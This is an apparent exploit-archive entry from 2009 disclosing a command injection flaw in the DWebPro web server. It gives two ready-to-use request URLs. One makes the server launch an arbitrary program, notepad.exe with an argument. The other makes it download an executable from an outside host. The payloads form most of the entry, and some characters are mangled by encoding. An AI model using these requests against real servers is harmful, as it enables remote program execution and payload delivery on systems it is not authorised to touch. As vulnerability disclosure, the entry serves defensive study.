[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DWebPro command injection
# Published : 2009-10-17
# Author : Rafael Sousa
# Previous Title : Mambo com_koesubmit 1.0.0 Remote File Inclusion
# Next Title : Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities
The last version of DWebPro allows an invader to execute any program. Just hit this at your browser:
http://127.0.0.1:8080/dwebpro/start?file=C:windowssystem32notepad.exe¶ms=C:hi.txt
And the notepad.exe will open a txt file that calls hi at C: server's side.
If you try this: http://127.0.0.1:8080/dwebpro/start?file=http://www.somesite.com.br/somefile.exe will open a browser at server side and download the file.
It's really dangerous.
I tested this at last version but may work at older versions as well.
Best Regards,
Rafael Sousa